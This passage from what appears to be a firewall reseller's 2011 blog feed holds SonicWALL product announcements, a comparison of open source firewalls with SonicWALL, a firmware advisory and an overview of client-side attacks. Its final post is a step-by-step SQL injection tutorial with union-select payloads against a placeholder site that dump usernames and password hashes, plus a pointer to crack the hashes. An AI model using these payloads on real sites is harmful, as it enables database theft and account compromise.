<p>The <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220</a> and 250M Series offer firewall protection with tightly integrated intrusion prevention, comprehensive gateway anti-malware services and granular application intelligence and control. Both appliances are available as <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wireless">dual-band wireless models</a>. The NSA 250M Series also supports a variety of modules such as T1/E1, ADSL (Annex A &amp; B), 2GbE SFP and LAN Bypass to further expand its deployment flexibility and reduce maintenance costs through equipment consolidation.</p>
<p>As well as providing extensive security for branch offices without degrading performance, the new appliances allow administrators to manage the unproductive use of network resources such as social media applications that eat away at precious network bandwidth and company resources if left unchecked. For example, a network administrator can allow the marketing team to reach out to customers via Facebook while restricting social and browser gaming during business hours.</p>
<p>"In distributed environments with multiple branch offices, the security at the periphery must be as good as the security at the core," said Dmitriy Ayrapetov, product line manager network security at SonicWALL. "With the introduction of the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220</a> and 250M, branch offices now have full deep packet inspection security for their entire network, including SSL-encrypted traffic while being able to take control of all the applications on their network. SonicWALL is the only company to deliver this scanning capability in this class of products."</p>
<p>The <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220</a> and 250M Series appliances offer advanced application traffic analytics to provide granular insight into application traffic, bandwidth utilization and security threats for troubleshooting and forensics, both in a real-time view on the firewall and a historic view through syslog, IPFIX and NetFlow exported data. Additionally, the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220</a> and 250M tightly integrate with SonicWALL's <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">recently announced WAN acceleration appliances</a>, reducing network traffic and latency between remote offices.</p>
<p><span style="font-weight: bold;">Key Features of SonicWALL </span><span style="font-weight: bold;">NSA 220</span><span style="font-weight: bold;"> and </span><span style="font-weight: bold;">250M Series</span></p>
<p>The SonicWALL <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220</a> and <a target="_blank" href="http://www.sonicwall.com/us/products/NSA_250M.html?utm_source=PressRelease%26utm_&utm_medium=2011Releases%26utm_campaign&utm_campaign=NSA_220_250">250M Series</a> high-performance next-generation firewalls provide distributed enterprises and branch offices alike with in-depth frontline security, as well as application and user control without compromising on network performance.</p>
<p><span style="font-weight: bold;">SonicWALL Reassembly-Free Deep Packet Inspection</span><span style="font-weight: bold;">™</span> (RFDPI)(1) engine protects against malware such as Trojans and worms, and segments out credit card transaction traffic as mandated by PCI DSS regulations. Unlike other scanning engines, the RFDPI engine is not limited by file size or the amount of concurrent traffic it can scan.</p>
<p><a target="_blank" href="http://www.sonicwall.com/us/products/Application_Intelligence_Control_Visualization.html"><span style="font-weight: bold;">SonicWALL Application Intelligence, Control and Visualization</span></a> enables IT to granularly view and control bandwidth-consuming and potentially dangerous application traffic over the network, even between widely distributed locations.</p>
<p><a target="_blank" href="http://www.sonicwall.com/us/products/Clean_Wireless_Series.html"><span style="font-weight: bold;">SonicWALL Clean Wireless</span></a><span style="font-weight: bold;">™, </span>optionally<span style="font-weight: bold;"></span>integrated into dual-band wireless models or via SonicWALL SonicPoint wireless access points, provides powerful and secure 802.11a/b/g/n 3x3 MIMO wireless, and enables scanning for rogue wireless access points in compliance with PCI DSS. </p>
<p><span style="font-weight: bold;">SonicWALL Clean VPN</span><span style="font-weight: bold;">™ </span>provides integrated secure remote access via site-to-site IPSec VPN or granular, easy-to-use SSL VPN.</p>
<p><span style="font-weight: bold;">SonicWALL WAN Acceleration</span>, enabled by the SonicWALL WXA Series, increases file transfer speeds between remote <a target="_blank" href="http://www.firewalls.com/solutions/firewall/small-business-firewall">branch office</a> sites and drives secure network optimization.</p>
<p><span style="font-weight: bold;">Integrated modules support</span> (on NSA 250M and NSA 250M-W Series appliances) reduces acquisition and maintenance costs through equipment consolidation, and adds deployment flexibility with support for SFP, T1/E1, ADSL (Annex A &amp; Annex B) and LAN Bypass modules.</p>
<p><span style="font-weight: bold; text-decoration: underline;">Availability</span></p>
<p>SonicWALL NSA 220 Series is available immediately. </p>SonicWALL NSA 250M Series is available immediately.]]></description>
      <pubDate>Thu, 27 Oct 2011 19:17:22 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Open source firewall distributions vs SonicWALL]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/open_source_firewall_vs_sonicwall_ngfw/</link>
      <description><![CDATA[<h3>Where to go</h3>
<p> When it comes to choosing a firewall solution many enterprises are faced with a  dilemma: to go the open source way or the &ldquo;traditional&rdquo; firewall vendors way.</p>
<p align="center"
>  <img src="http://static.firewalls.com/media/wysiwyg/firewalls/where.png" alt="" /></p>
<p>  At a glance the open source way is appealing being often  associated with the words free and customization. One can build from scratch a  firewall based on various Linux distros or BSD versions. Alternatively open  source firewall distributions are available, free or commercial versions(like pfSense,  SmoothWall, etc).</p>
<p> Also at a glance, the firewall vendors way is appealing as  it offers robust solutions(e.g. SonicWALL with its Next Generation Firewall).  An obvious contrast with the open source is the free word, especially if  compared with entry-level UTMs like pfSense.</p>
<h4> The free aspect</h4>
<p> Are the open source firewall distributions really free?<br>
  <strong>No, not really.</strong></p>
<div class="add-to-holder"> 
  <p>Consider for example pfSense and the signatures  set of the popular Snort IDS/IPS. Using the free version of them means to be  30-days behind threats.</p>
  <p>Similar with a free blacklist for Squidguard, limited database of domains and  IPs. For decent filtering, one would use commercial blacklists.<br>
  </p>
</div>
<p>Also while there are free versions of commercial distros(e.g.  SmoothWall Express), these include limited features providing little protection  for enterprises.</p>
<h3> The customization aspect</h3>
<p> Requires a capable staff which many organizations do not have(extra costs) and  great care with a firewall distro(it is possible that various updates to wipe  out or broke custom modifications); increased TCO.</p>
<div class="add-to-holder"> In fact, some open source firewall distributions  advertise their products as requiring little Linux-knowledge.</div>
<h3> The current threat landscape</h3>
<p> In today&rsquo;s world most of attacks take place at the application level,  especially web-based attacks are prominent and organizations struggle to  control the use of feature-rich Web 2.0 and not only applications. Stateful  packet inspection is no longer sufficient. The focus is on controlling and  managing users&rsquo; applications(not just block them) and achieve mitigation at the  gateway level against blended threats.</p>
<h3> Going head to head</h3>
<table  cellspacing="0" class="data-table" id="product-attribute-specs-table">
  <thead><tr>
    <th ><strong>Feature</strong></th>
    <th ><p><strong>Open Source Firewalls</strong></p></th>
    <th ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall" style="color: #000
    "><strong>SonicWALL NGFW</strong></a></p></th>
  </tr></thead>
  <tr>
    <td ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">NGFW</a></p></td>
    <td ><p>No, UTMs(exception would be Astaro).</p></td>
    <td ><p>Yes.</p></td>
  </tr>
  <tr class="odd">
    <td ><p>Web Proxy and Content Filtering</p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Free: most use Squid and cannot inspect HTTPS    traffic or do group based authentication against AD out-of-the-box(e.g.    pfSense which also only uses Basic authentication(prompts users) and not NTLM    too).</li>
      <li>Basic URLF can be freely achieved with    Squidguard. The free blacklists available are limited. Commercial blacklists contain    only 1-2 millions domains names; not enough for a strong solution(e.g.    pfSense&rsquo;s case).</li>
      <li>More advanced web content filtering with    Dansguardian(not free for commercial use).</li>
      <li>SmoothWall commercial versions offers advanced    features and authentication options.</li>
    </ul></td>
    <td  valign="top"><ul style="list-style:circle; margin-left:30px">
      <li>Out-of-the-box HTTPS inspections and ability    to create users/groups-based rules.</li>
      <li>Includes a local URLF and Content Filtering    solution. A dynamic database of millions of IP addresses and domains names is    used.</li>
    </ul></td>
  </tr>
  <tr>
    <td ><p>Application control</p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Limited; e.g. pfSense with ipfw-classifyd (used    to classify TCP and UDP packets according to regular expression patterns) can    block/allow/shape traffic of various applications. The number of    out-of-the-box available applications is small.</li>
      <li>Also pfSense lacks the ability to create    user-based firewalls rules.</li>
    </ul></td>
    <td ><p>Granular control; is able to control(allow/block) and prioritize thousands    of applications and their features out-of-the-box. Furthermore has ability to    create firewall rules based on applications and users not just on ports,    protocols and IP addresses.</p></td>
  </tr>
  <tr class="odd">
    <td ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer">Monitoring and reporting</a></p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Free: basic features, e.g. pfSense LightSquid    to report users&rsquo; web activity. Regular features like ntop or packet    capturing.</li>
      <li>More advanced features into commercial products    like the ones from SmoothWall.</li>
    </ul></td>
    <td ><p>Advanced visibility into users&rsquo; traffic, including live monitoring of    applications seen through the firewall. Real-time knowledge of what&rsquo;s going    through the firewall in terms of applications and users, not just protocols.</p></td>
  </tr>
  <tr>
    <td ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">IDS/IPS</a></p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Free: Snort-based; requires commercial    signatures set for proper protection though.</li>
    </ul></td>
    <td ><p>As a NGFW, SonicWALL features an integrated IPS protecting against    network, client or server-based attacks.</p></td>
  </tr>
  <tr class="odd">
    <td ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">Gateway AV</a></p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Free: ClamAV-based; limited, e.g. pfSense&rsquo;s HAVP    scans HTTP traffic, but does not scan FTP or HTTPS traffic.</li>
      <li>More advanced features into commercial    products like the ones from SmoothWall.</li>
    </ul></td>
    <td ><p>As    a NGFW, SonicWALL features an integrated AV and antimalware engine(Intelligent    Cloud Malware Detection Engine). Scans encrypted traffic too.</p></td>
  </tr>
  <tr>
    <td ><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SSL VPN</a></p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Yes, but with limited mobile clients support.</li>
    </ul></td>
    <td ><p>Yes,    with support of mobile clients.</p></td>
  </tr>
  <tr class="odd">
    <td ><p>Performance</p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Medium; performance degrades when all security    features are enabled.</li>
    </ul></td>
    <td ><p>High due    to the SonicWALL Reassembly-Free Deep Packet Inspection highly efficient,    single-pass engine.</p></td>
  </tr>
  <tr>
    <td ><p>Management</p></td>
    <td ><ul style="list-style:circle; margin-left:30px">
      <li>Free, e.g. pfSense: easy-to-use web interface    but features are rather managed separately.</li>
    </ul></td>
    <td ><p>Easy-to-use web    interface plus Global Management System<br>
      (GMS) in wide deployments.</p></td>
  </tr>
</table>
<h3>Summary</h3>
<p> For protection against today&rsquo;s real world threats there is no free solution. Open  Source Firewall Distributions like pfSense can provide a decent level of  protection when used with commercial features, but cannot match the high level  of protection offered by a NGFW.</p>
]]></description>
      <pubDate>Tue, 25 Oct 2011 15:01:22 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicOS Firmware 5.6.0.12 Now Available]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/firmware_56012/</link>
      <description><![CDATA[<table><TR><TD><img style="float: left;" src="http://static.firewalls.com/media/wysiwyg/firewalls/sonicwall-firmware.jpg" alt="" /></TD><TD>&nbsp;SonicWALL has released a new firmware version for the SonicWALL firewall UTM appliances. &nbsp;This minor release of the SonicOS Enhanced firmware provides fixes and or security updates for your SonicWALL firewall. &nbsp;The current releases fixes the following problems:</TD></TR></TABLE>
<h3>Symptom:</h3>
<p>SonicOS management SessionID brute force&nbsp;vulnerability when attempted from the same&nbsp;source IP as a legitimate administrator's active&nbsp;management session.</p>
<h3>Fix / Workaround:</h3>
<p>Occurs when the brute force attacker finds the&nbsp;legitimate SessionID, which is valid for use onlyfrom the source IP of the legitimate administrator&nbsp;during an active session, from one of4,294,967,296 possible SessionIDs (a session is&nbsp;active between the time legitimate administrator&nbsp;logs on and off). The SessionID security&nbsp;enhancement requires the attacker to guess the&nbsp;legitimate SessionID from one of&nbsp;340,282,366,920,938,463,463,374,607,431,768,211,456 possible SessionIDs, and therefore&nbsp;requiring an attack on an active administrative&nbsp;session, from the same source IP of the&nbsp;administrator, to last&nbsp;2,697,570,767,701,495,615,277,217,349,632&nbsp;years.</p>
<p>&nbsp;</p>
<h3>How to Download:</h3>
<p>IF you have an active support agreement you can download the latest firmware from you<a href="http://www.mysonicwall.com"> http://www.mysonicwall.com</a> account.</p>
<h3>Need to Renew Your Support Subscription</h3>
<p>If you <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-support">SonicWALL support</a> subscription has lapsed <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-support">you can renew it today</a>.</p>]]></description>
      <pubDate>Tue, 25 Oct 2011 12:33:35 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Client-side Attacks]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/client_side_attack/</link>
      <description><![CDATA[<h3>Client-side attacks lead to breaches</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/cli_side.png" alt="" /></td>
    <td>Attackers  use client-side attacks to gain access to critical assets and information. They  do so by finding and exploiting vulnerabilities in client-side software or by  employing social engineering techniques.<br>
High profile breaches, e.g. the Google or RSA incidents,  involved client-side attacks.</td>
  </tr>
</table>
<h3>  Why not breach the perimeter?</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/locked.png" alt="" /></td>
    <td>Internet  exposed services may be placed in hardened perimeters; attacking them and  pivoting till the internal network is reached might not be such a simple option  for attackers.</td>
  </tr>
</table>
<h3>  Client-side a weak appealing link</h3>
<p> Workstations are different than servers; they ran many third-party  applications. Keeping up-to-date all the software installed on users’ machines  is a problem(especially when some not even include an update manager). All  unpatched or outdated software can serve as attack vectors that may allow  remote code execution.<br />
<div align="center">
 <img src="http://static.firewalls.com/media/wysiwyg/firewalls/entry_points.png" alt="" /></div><br>
  Users, and implicitly their workstations, have legitimate  access( possible very little inspected) to important assets and information;  after a user machine is compromised, a pivot attack can be used to easily  attack an internal server holding valuable data.<br>
  Also users have access to the Internet, so obtained data can  be siphoned out of the network and the compromised machines and servers be controlled  remotely.</p>
<h3> How the attack is served?</h3>
<p> There are a couple of possibilities, exploiting vulnerabilities(including 0-day  vulnerabilities) or not.</p>
<ul style="margin-left:35px">
  <li>Email; a malicious link or payload(e.g. attached  Word or PDF documents) is sent into an email that looks legit. The link might  be hosted on a compromised popular site.</li>
  <li>Web site; serving the malicious payload from a  compromised site that the user normally visits.</li>
  <li>Social engineering; no vulnerabilities are  needed to install the malicious software, attackers convince the users to  install it through various techniques, e.g. rogue antivirus, computer speed  boost software, etc. Instant messaging might be involved and users convinced to  accept an upload containing a malicious executable that they will run.</li>
</ul>
<h3>Aftermath</h3>
<p> After the user’s machine is compromised, attackers, if needed, escalate  privileges and map the internal network. They will use the machine as a pivot  to attack and compromise other machines till they reach their target(s).</p>
<p> Once inside, if careful enough, attackers can stay  undetected for months or years.</p>
<h3> Mitigations</h3>
<p> It’s not a simple task to fight such attacks. Mitigations include client-side,  user-side, penetration testing, secure internal network design and network  egress/ingress filtering measures.</p>
<ul style="margin-left:35px">
  <li>Client-side: establish a baseline of monitoring,  patching and updating installed software.</li>
  <li>Client-side: install centrally managed security  protection suites(HIPS, AV, FW).</li>
  <li>Client-side: use GPO to restrict users’  privileges and control the installation of software.</li>
  <li>User-side: training programs to raise users’  awareness and education.</li>
  <li>Penetration testing for client-side; normally  pen test are done against services exposed to the Internet to identify  vulnerabilities(e.g. web services vulnerable to SQLi, XSS, CSRF, etc.). Same  can be done to identify client-side vulnerabilities and their level of  exploitability.</li>
  <li>Secure internal network design; some use a flat  internal network design(no or little separation, either physical or logical),  assuming that since this is not directly reachable from the Internet is somehow  secure. </li>
  <li>Network egress/ingress filtering measures: email  filters(content, spam, AV) to block potential dangerous emails reaching users’  inbox.</li>
  <li>Network egress/ingress filtering measures: use  NGFW like the SonicWALL E-Class NSA series to proactively control and gain  visibility into users’ applications traffic instead of filtering per  protocol/port. Additionally such firewalls include modern IPS with client-side  attacks prevention capabilities, gateway AV and antimalware engines to identify  and block possible malware entering the network along with bandwidth monitoring  that helps you detect massive data/information leakage.</li>
</ul>
<h3>Summary</h3>
<p> Client-side attacks are not something new and get better and better as time  goes by now that the perimeter is hardened. They are no longer centered on  OS(e.g. Microsoft Windows) and target many third-party applications. If not  taken into serious consideration, they can lead to a total internal network compromise.</p>
]]></description>
      <pubDate>Tue, 18 Oct 2011 16:57:57 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Announces Suite of Application Traffic Analytics Tools ]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_scrutinizer/</link>
      <description><![CDATA[<h1>
   SonicWALL Announces Suite of <a href="http://www.firewalls.com/sonicwall/reporting">Application Traffic Analytics Tools </a></h1>

<p>Historical and Real-Time Forensic and Visual Analytics Transform Network Protection, Management and Productivity</p>
<p><a onclick="linkOnClick(this)" target="_blank" href="http://www.firewalls.com">SonicWALL Inc</a>. announced the launch of its <a href="http://www.firewalls.com/sonicwall/reporting">Application Traffic Analytics software suite</a>. This next-generation solution consists of SonicWALL Global Management System (GMS) 7.0, <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">Analyzer</a> and <a href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer">Scrutinizer</a> and provides enterprise IT managers with unparalleled insight into   real-time and historical network bandwidth utilization, application   traffic, security threats and employee productivity. The new Application   Traffic Analytics solutions suite provides powerful visualization into   the network to assist administrators with troubleshooting and ease with   overall network management.</p>
<p>The   ability to deliver historical and real-time forensic insight into   application and data traffic flowing through a network enables IT   managers to better predict, prepare, respond to -- and avoid --   bandwidth spikes. It also helps manage security threats, inappropriate   application usage and network outages. The SonicWALL suite of <a onclick="linkOnClick(this)" target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer">Application Traffic Analytics</a> solutions improves network management and helps drive ROI and business   productivity by ensuring business-critical service-level and compliance   requirements are consistently met. </p>
<p>For   enterprises, the SonicWALL Application Traffic Analytics solution   combines a SonicWALL Next-Generation Firewall and either the SonicWALL   GMS 7.0 or <a onclick="linkOnClick(this)" target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer">SonicWALL Scrutinizer</a>.   For small- to medium-sized businesses, the SonicWALL Application   Traffic Analytics solution combines a SonicWALL Next-Generation Firewall   and either SonicWALL GMS 7.0 or <a onclick="linkOnClick(this)" target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">SonicWALL Analyzer</a>.   SonicWALL's Next-Generation Firewalls with the Reassembly-Free Deep   Packet Inspection™ (RFDPI) engine provide the rich data source that is   then utilized by these tools to give users unmatched deep real-time and   historical insight.</p>
<p>"Network   administrators are under continual pressure to minimize costs and   optimize network capital investment, while facing exponential growth in   business applications, digital content and network growth. 50% of   companies surveyed by industry analyst firm Forrester Research said at   least 30% of their bandwidth is being consumed by social networking   traffic.(1) Being able to truly visualize, prioritize and protect   network traffic flow is a business critical requirement," said John Gmuender,   vice president of engineering and CTO of SonicWALL. "By utilizing the   network security SonicOS platform that leverages the unique capabilities   of our RFDPI engine, our new suite of Application Traffic Analytics   gives the ability to eye-ball and analyze historical and real time data   and application flow. By delivering granular hindsight, we give our   customers the foresight to better plan and manage the corporate network   in a way that translates directly to the bottom line through enhanced   network performance, security and ROI."</p>
<p>Said Michael Crean,   CEO of Solutions Granted, Inc., a solution-based information technology   firm specializing in complete managed services, network development and   security, "SonicWALL's new application traffic analytics allow us to   have more meaningful business discussions with our customers. For   example, we can show in detail which applications are used most in a   given day, month or year and which applications are a legitimate use of   their network infrastructure and their employees' time. This level of   visibility and analytics helps us help our customers enhance their ROI   and productivity." </p>
<p>The SonicWALL suite of Application Traffic Analytics includes:</p>
<p><u><strong><a href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer">SonicWALL </a></strong></u><a href="http://www.firewalls.com/sonicwall/sonicwall-scrutinizer"><strong>Scrutinizer</strong>:   </a>a multi-vendor, application traffic analytics visualization and   reporting tool that measures and troubleshoots network performance and   utilization while increasing productivity for enterprises and managed   service providers. Granular visualization and analytic reporting   capabilities include deep packet analysis, jitter/latency monitoring,   automated reports and customizable dashboards. Scrutinizer also provides   advanced analysis, historical and advanced reporting, role-based   administration and threshold-based alerts. Of particular value to MSPs   and ISPs are granular role-based access controls, scheduled over-usage   data exports for billing and invoicing and customizable style sheets for   branding. SonicWALL Scrutinizer supports a broad range of routers,   switches, firewalls, and data-flow reporting protocols from a wide   variety of vendors. Scrutinizer provides critical insight into   application traffic analysis from IPFIX/NetFlow data exported by   SonicWALL firewalls.</p>
<p><u><strong>SonicWALL </strong><strong>Global Management System (GMS) 7.0</strong><strong>:</strong></u></p>
<p>The   SonicWALL Global Management System enables organizations of all sizes   to globally manage, monitor and report on up to thousands of remote   SonicWALL appliances.</p>
<p>Features include:</p>
<ul type="disc">
  <li><strong>Centralized security</strong> and network management to help deploy and manage a distributed environment</li>
  <li><strong>Universal dashboard</strong> features customizable widgets, geographic maps, and user-centric reporting</li>
  <li><strong>Real-time and comprehensive policy and compliance reporting</strong> across thousands of SonicWALL firewalls</li>
  <li><strong>Streamlined license management</strong> from a single console</li>
  <li><strong>Centralized logging,</strong> providing a single point for conducting network forensics</li>
  <li><strong>Next-generation syslog reporting</strong> that streamlines time-consuming summarizing incoming syslog data</li>
  <li><strong>Custom reporting and activity visualization </strong>with<strong> </strong>extensive drill-down capabilities<strong> </strong>for per user reporting on application usage, websites visited and blocked, backup activity and remote user connectivity</li>
  <li><strong>Extensive cross-platform reporting </strong>for   numerous SonicWALL products, including Firewalls, Anti-Spam, Backup and   Recovery (Continuous Data Protection) and Secure Remote Access (SRA)   platforms</li>
  <li><strong>Active-device monitoring and alerting</strong> enable preventative action and deliver immediate remediation</li>
  <li><strong>SNMP support </strong>provides,   real-time traps for all TCP/IP and SNMP-enabled devices and   applications, enhancing troubleshooting to pinpoint and respond to   critical network events</li>
</ul>
<br>
<p><u><strong><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">SonicWALL </a></strong></u><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer"><strong>Analyzer</strong></a><strong>:</strong> includes most of the new reporting features available in GMS 7.0 but is   targeted at the smaller SMB network. <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">Analyzer</a> is an easy to use   web-based tool that provides both real-time and historical application   traffic analytics and security event reporting to IT administrators with   extensive drill down capabilities to analyze the performance and   security of their networks. Analyzer supports SonicWALL firewalls,   backup and recovery appliances, and secure remote access devices while   leveraging application traffic analytics for security event reports.   Reports include: Real-time and historical traffic analysis,   comprehensive graphical reports, user centric reports, next-gen syslog   reporting, Secure Remote Access (SRA) and Continuous Data Protection   (CDP) event reporting and universal scheduled reports. </p>
<p><u><strong>Pricing and Availability</strong></u></p>
<p>SonicWALL Scrutinizer is available immediately. Pricing starts at a list price of US$3,495. </p>
<p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">SonicWALL Analyzer</a> and SonicWALL Global Management System Version 7.0 will be available in November 2011. </p>
<p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-analyzer">Analyzer</a> will start at a list price of $125 for TZ Series products. Pricing for GMS remains unchanged. </p>
]]></description>
      <pubDate>Tue, 11 Oct 2011 04:57:30 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Introduction to SQL Injection]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sql_injection/</link>
      <description><![CDATA[<table>
  <tr>
    <td><img src="/images/stay-secure-doc.png" alt="stay secure"></td>
    <td><h3><strong>INTRODUCTION  TO SQL INJECTION</strong></h3>
    <p> SQL injection exploits vulnerabilities that exist in a web  application. This technique can be used to gain access to web servers, extract,  modify databases, information and run commands remotely.</p></td>
  </tr>
</table>
<h3> <strong>HOW DOES IT  WORK?</strong></h3>
<p>  SQL injection exists due to carelessness of the web  application programmer. The technique involves inserting or &ldquo;injecting&rdquo; SQL  queries into user input areas such as textboxes, address bar etc. If the web  application does not sanitize the inputted data properly, it will end up  running the query and displaying the results to the attacker.</p>
<h3> <strong>WHAT IS AT  STAKE?</strong></h3>
<p>  A vulnerable website could give away all of its information  stored in databases including mailing lists, customer information, usernames  and passwords. That&rsquo;s not all though, advanced SQL queries allow remote code  execution and file system access on the server, giving an attacker complete  control over the machine. Bypassing all other security measures one may have  setup.</p>
<h3> <strong>AM I  VULNERABLE?</strong></h3>
<p>  To test if your site is vulnerable first surf a bit around  until you find a URL like this:</p>
<p> www.victim.com/index.php?id=1<br>
  or<br>
www.victim.com/index.php?page=news</p>
<p> What  we are interested in is <strong>&ldquo;id=1&rdquo; </strong>or <strong>&ldquo;page=news&rdquo;</strong> or anything like that.<br>
Once you have found such a page simply put a &ldquo; <strong>&rsquo;</strong> &ldquo; before the last digit or word.</p>
<p> www.victim.com/index.php?id=&rsquo;1<br>
  or<br>
www.victim.com/index.php?page=&rsquo;news</p>
<p> Now  reload the page, if you get an error like</p>
<p> <strong>Warning</strong>: mysql_fetch_object(): supplied argument is  not a valid MySQL result resource in&nbsp;<strong>D:\inetpub\victim.com\index.php</strong>&nbsp;on line&nbsp;<strong>10</strong></p>
<p>  This  implies that the website is indeed vulnerable. The single quote <strong>&lsquo;</strong> that we injected tells the server that this is the start of an SQL query. The  error confirms that it tried to run a blank query.</p>
<p> <strong>FIRST STEPS</strong></p>
<p>  The  first step is to identify the <strong>number of  columns</strong> in the database. To do so we will use the <strong>order by</strong> attribute.</p>
<p> <a href="http://www.victim.com/index.php?id=1" rel=" nofollow" >www.victim.com/index.php?id=1</a> order by 1--<br> Reload  the page (don&rsquo;t forget – at the end), if all goes well, the page will load  normally (no errors). Change the &ldquo;1&rdquo; to &ldquo;2&rdquo; and hit again.</p>
<p> <a href="http://www.victim.com/index.php?id=1" rel=" nofollow">www.victim.com/index.php?id=1</a> order by 2--<br>
Keep  doing this (incrementing) until we get an error. So for example if </p>
<p> www.victim.com/index.php?id=1  order by 6--<br>
generated  an error, this would mean we have <strong>5</strong> columns.</p>
<p> Next,  we need to find the column that is vulnerable. Use the following query for this  purpose.<br>
  www.victim.com/index.php?id=1  union select 1,2,3,4,5--<br clear="all">
  <br>
Include  all the columns that you found (I&rsquo;m assuming 5 in this case). When you load  this, a few numbers should appear. Assuming I got<strong> 2 </strong>and <strong>4</strong>. This means  column 2 and 4 are both vulnerable.</p>
<p> <strong>SQLi IN ACTION</strong></p>
<p>  The  anatomy of an SQLi hack can be summed up as:
</p>
<ol>
  <li><strong>Find  the database version</strong></li>

<p>www.victim.com/index.php?id=1  union select 1,@@version,2,3,4,5--<strong> </strong><br>
  Replace  any of your vulnerable column number with <strong>@@version</strong> and reload. </p>

  <li><strong>Find  database name</strong></li>

<p>www.victim.com/index.php?id=1  union select 1,concat(database()),2,3,4,5 from  information_schema.schemata-- <br>
  Replace  @@version with <strong>concat(database())</strong> and add <strong>from information_schema.schemata</strong> at the end.</p>

  <li><strong>Find  Table names</strong></li>

<p>www.victim.com/index.php?id=1  union select 1,group_concat(table_name) from  information_schema.tables where table_schema=database()--<br>
  When  you run this, you will get a list of all the tables in the database.</p></ol>
<h3> <strong>FINDING INTERESTING TABLES</strong></h3>
<p>  There  is a high probability of finding tables like <strong>usertbl </strong>or <strong>logintbl</strong>.  Usually you will find tables with user names and passwords (encrypted mostly),  transactions, mailing lists, orders etc.</p>
<p> Each  table has some columns. Columns contain the data. For example, <strong>usertbl</strong> table could have the columns <strong>username, password, id</strong>.</p>
<p> Use  this syntax to view columns available.</p>
<p> www.victim.com/index.php?id=1  union select 1,group_concat(coloumn_name) from  information_schema.columns where table_schema=database()--</p>
<p> This will print available columns on the  webpage. Assuming you found a table with login credentials, use this syntax to  get the data.</p>
<p> Replace  databasename and tablename with appropriate ones.<br>
  www.victim.com/index.php?id=1  union select  1,group_concat(username,0x3a,password,0x3a,id) from databasename.tablename--</p>
<h4> <strong>Sample  Output:</strong></h4>
<table>
  <tr>
    <td><strong>username</strong></td>
    <td><strong>password</strong></td>
    <td><strong>id</strong></td>
  </tr>
  <tr>
    <td>jab23</td>
    <td>bkdhf87ey34uhf</td>
    <td>2</td>
  </tr>
  <tr>
    <td>john</td>
    <td>hdiushd543tef4</td>
    <td>3</td>
  </tr>
  <tr>
    <td>admin</td>
    <td>cdasf3r3rfh8ff</td>
    <td>4</td>
  </tr>
</table>
<p> The  passwords are encrypted by MD5 algorithm. Use <a href="http://www.hashcrack.com" rel=" nofollow">www.hashcrack.com</a> to decrypt it into plaintext.</p>
]]></description>
      <pubDate>Fri, 07 Oct 2011 15:34:42 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWall VPN Clients vs. NetExtender Client]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_vpn_client/</link>
